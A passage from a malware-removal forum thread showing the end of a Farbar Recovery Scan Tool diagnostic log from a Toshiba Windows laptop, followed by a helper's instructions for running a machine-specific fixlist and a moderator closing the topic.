HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\TOSHIBA-1.jpg
DNS Servers: 192.168.1.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 2) (ConsentPromptBehaviorUser: 1) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [WinCollab-Out-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-In-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-Out-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-In-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-DFSR-Out-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe
FirewallRules: [WinCollab-DFSR-In-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe
FirewallRules: [{EFE7CF45-1DAA-444A-9D68-63305F72B7B9}] => (Allow) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\PowerCinema.exe
FirewallRules: [{80374A2A-F190-4E76-B229-C33B434E33CC}] => (Allow) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\PCMService.exe
FirewallRules: [{1B9C4756-D936-4A65-8F71-23B96B9920E7}] => (Allow) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\DMP\CLBrowserEngine.exe
FirewallRules: [{A249412C-65ED-478F-A265-730F2670C0CB}] => (Allow) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\DMS\CLMSService.exe
FirewallRules: [{B7258A50-52F6-4718-AA9D-F64826CF7940}] => (Allow) LPort=80
FirewallRules: [{783ED446-2EB5-4D16-AA1E-E2891F07EE59}] => (Allow) LPort=80
FirewallRules: [{70403FF4-1D67-4D9B-B897-BA6F806EACA6}] => (Allow) LPort=80
FirewallRules: [{D2221019-1105-4A94-89C3-3937E8375ED2}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{2C84BC51-F1B7-4BAB-ADBF-0543D8DF3E29}] => (Allow) LPort=2869
FirewallRules: [{D84264C9-3FEF-42B5-8D9F-11A47526CF13}] => (Allow) LPort=1900
FirewallRules: [{789E738D-DA66-4A05-B263-F7D8AFE251B2}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{9395CA26-0EC4-458B-ACD7-E1A49CC22B00}] => (Allow) C:\Program Files (x86)\Windows Live\Mesh\MOE.exe
FirewallRules: [{B7B911B3-E1A8-4E65-AFA0-AFCF782744C5}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{3F71D384-650E-4A4C-B0BE-0791DBAF9E52}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{E8190506-4194-426F-9C00-B06D1C8072CC}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{FF7A96AF-877F-41DF-B6A7-A5490ECE3775}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

==================== Restore Points =========================

09-09-2015 11:00:57 Windows Update
10-09-2015 18:07:18 Windows Update
15-09-2015 07:55:18 Windows Update
18-09-2015 17:16:42 Windows Update
22-09-2015 14:11:34 Windows Update
26-09-2015 09:52:55 Windows Update
30-09-2015 10:34:26 Windows Update
03-10-2015 14:53:55 Windows Update
07-10-2015 17:52:14 Windows Update
11-10-2015 19:12:09 Windows Update
14-10-2015 19:51:23 Windows Update
15-10-2015 09:28:46 Windows Update
19-10-2015 11:40:48 Windows Update
22-10-2015 17:02:18 Windows Update
29-10-2015 19:01:20 Windows Update
03-11-2015 10:52:06 Windows Update
08-11-2015 11:52:57 Windows Update
12-11-2015 20:50:58 Windows Update
12-11-2015 21:46:25 Windows Update
16-11-2015 15:08:37 Windows Update
20-11-2015 19:26:46 Windows Update
27-11-2015 19:04:56 Windows Update
01-12-2015 12:15:00 Windows Update
04-12-2015 15:03:04 Windows Update
11-12-2015 12:52:52 Windows Update
14-12-2015 12:24:39 Windows Update
17-12-2015 18:42:37 Windows Update
26-12-2015 11:41:26 Windows Update
29-12-2015 21:04:35 Windows Update
03-01-2016 21:07:54 Windows Update
08-01-2016 18:16:31 Windows Update
16-01-2016 08:03:26 Windows Update
17-01-2016 11:42:08 Windows Update
21-01-2016 12:58:31 Windows Update
23-01-2016 18:29:26 Removed Ask Toolbar.
23-01-2016 18:35:35 Removed SlimCleaner Plus
29-01-2016 17:25:50 Removed Bing Bar
29-01-2016 17:45:18 Windows Update

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (01/30/2016 12:16:33 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (01/29/2016 05:31:49 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (01/29/2016 05:28:52 PM) (Source: EventSystem) (EventID: 4621) (User: )
Description: 80070005EventSystem.EventSubscription{60E12429-8258-44D3-B6B8-1E56EC5E24C3}-{00000000-0000-0000-0000-000000000000}-{00000000-0000-0000-0000-000000000000}

Error: (01/29/2016 05:11:25 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (01/27/2016 03:17:02 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (01/27/2016 03:06:33 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (01/26/2016 03:26:31 AM) (Source: EventSystem) (EventID: 4621) (User: )
Description: 80070005EventSystem.EventSubscription{6B3B7FCC-8870-4356-B799-369B66E9E2D1}-{00000000-0000-0000-0000-000000000000}-{00000000-0000-0000-0000-000000000000}

Error: (01/26/2016 02:58:19 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (01/24/2016 02:45:42 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (01/24/2016 02:39:15 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003


System errors:
=============
Error: (01/30/2016 12:15:57 PM) (Source: Dhcp) (EventID: 1002) (User: )
Description: The IP address lease 10.0.0.10 for the Network Card with network address 001E65142DE0 has been denied by the DHCP server 192.168.1.254 (The DHCP Server sent a DHCPNACK message).

Error: (01/29/2016 05:57:29 PM) (Source: ssidrv) (EventID: 26) (User: )
Description: Failed to set monitor event rule.

Error: (01/29/2016 05:38:11 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 115.31.0.0

    Update Source: %NT AUTHORITY51

    Update Stage: 4.8.0204.00

    Source Path: 4.8.0204.01

    Signature Type: %NT AUTHORITY602

    Update Type: %NT AUTHORITY604

    User: NT AUTHORITY\NETWORK SERVICE

    Current Engine Version: %NT AUTHORITY605

    Previous Engine Version: %NT AUTHORITY606

    Error code: %NT AUTHORITY607

    Error description: %NT AUTHORITY608

Error: (01/29/2016 05:37:42 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.213.3845.0

    Update Source: %NT AUTHORITY51

    Update Stage: 4.8.0204.00

    Source Path: 4.8.0204.01

    Signature Type: %NT AUTHORITY602

    Update Type: %NT AUTHORITY604

    User: NT AUTHORITY\NETWORK SERVICE

    Current Engine Version: %NT AUTHORITY605

    Previous Engine Version: %NT AUTHORITY606

    Error code: %NT AUTHORITY607

    Error description: %NT AUTHORITY608

Error: (01/29/2016 05:37:42 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.213.3845.0

    Update Source: %NT AUTHORITY51

    Update Stage: 4.8.0204.00

    Source Path: 4.8.0204.01

    Signature Type: %NT AUTHORITY602

    Update Type: %NT AUTHORITY604

    User: NT AUTHORITY\NETWORK SERVICE

    Current Engine Version: %NT AUTHORITY605

    Previous Engine Version: %NT AUTHORITY606

    Error code: %NT AUTHORITY607

    Error description: %NT AUTHORITY608

Error: (01/29/2016 05:36:50 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.213.3845.0

    Update Source: %NT AUTHORITY59

    Update Stage: 4.8.0204.00

    Source Path: 4.8.0204.01

    Signature Type: %NT AUTHORITY602

    Update Type: %NT AUTHORITY604

    User: NT AUTHORITY\SYSTEM

    Current Engine Version: %NT AUTHORITY605

    Previous Engine Version: %NT AUTHORITY606

    Error code: %NT AUTHORITY607

    Error description: %NT AUTHORITY608

Error: (01/29/2016 05:31:49 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: ConfigFree Service%%1053

Error: (01/29/2016 05:31:49 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: 30000ConfigFree Service

Error: (01/29/2016 05:28:52 PM) (Source: ssidrv) (EventID: 26) (User: )
Description: Failed to set monitor event rule.

Error: (01/29/2016 05:24:22 PM) (Source: Dhcp) (EventID: 1002) (User: )
Description: The IP address lease 10.236.153.51 for the Network Card with network address 001E65142DE0 has been denied by the DHCP server 10.0.0.1 (The DHCP Server sent a DHCPNACK message).


CodeIntegrity:
===================================
  Date: 2016-01-30 12:35:59.759
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-30 12:35:59.556
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-30 12:35:59.228
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-30 12:35:58.885
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-30 12:35:58.495
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-30 12:35:58.230
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-30 12:35:57.855
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-30 12:35:57.653
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-30 12:35:15.566
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\ssidrv.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-30 12:35:15.230
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\ssidrv.sys because the set of per-page image hashes could not be found on the system.


==================== Memory info ===========================

Processor: Intel® Core2 Duo CPU P7350 @ 2.00GHz
Percentage of memory in use: 43%
Total physical RAM: 4093.04 MB
Available physical RAM: 2331 MB
Total Virtual: 8393.36 MB
Available Virtual: 6361.18 MB

==================== Drives ================================

Drive c: (TI100343V0F) (Fixed) (Total:454.05 GB) (Free:335.62 GB) NTFS ==>[drive with boot components (obtained from BCD)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 008CB0AA)
Partition 1: (Not Active) - (Size=1.5 GB) - (Type=27)
Partition 2: (Active) - (Size=454.1 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=10.2 GB) - (Type=17)

==================== End of Addition.txt ============================

Link to post
Share on other sites

FRST.gif Fix with Farbar Recovery Scan Tool
 


icon_exclaim.gif This fix was created for this user for use on that particular machine. icon_exclaim.gif
icon_exclaim.gif Running it on another one may cause damage and render the system unstable. icon_exclaim.gif

 
Download attached fixlist.txt file and save it to the Desktop:
 
Both files, FRST and fixlist.txt have to be in the same location or the fix will not work!

  • Right-click on FRST.gif icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
    (XP users click run after receipt of Windows Security Warning - Open File).
  • Press the Fix button just once and wait.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finished FRST will generate a log on the Desktop, called Fixlog.txt.

Please attach it to your reply.

fixlist.txt

Link to post
Share on other sites

  • 2 weeks later...
  • Root Admin

Glad we could help. :)

If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread.

Other members who need assistance please start your own topic in a new thread. Thanks!

Link to post
Share on other sites

Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.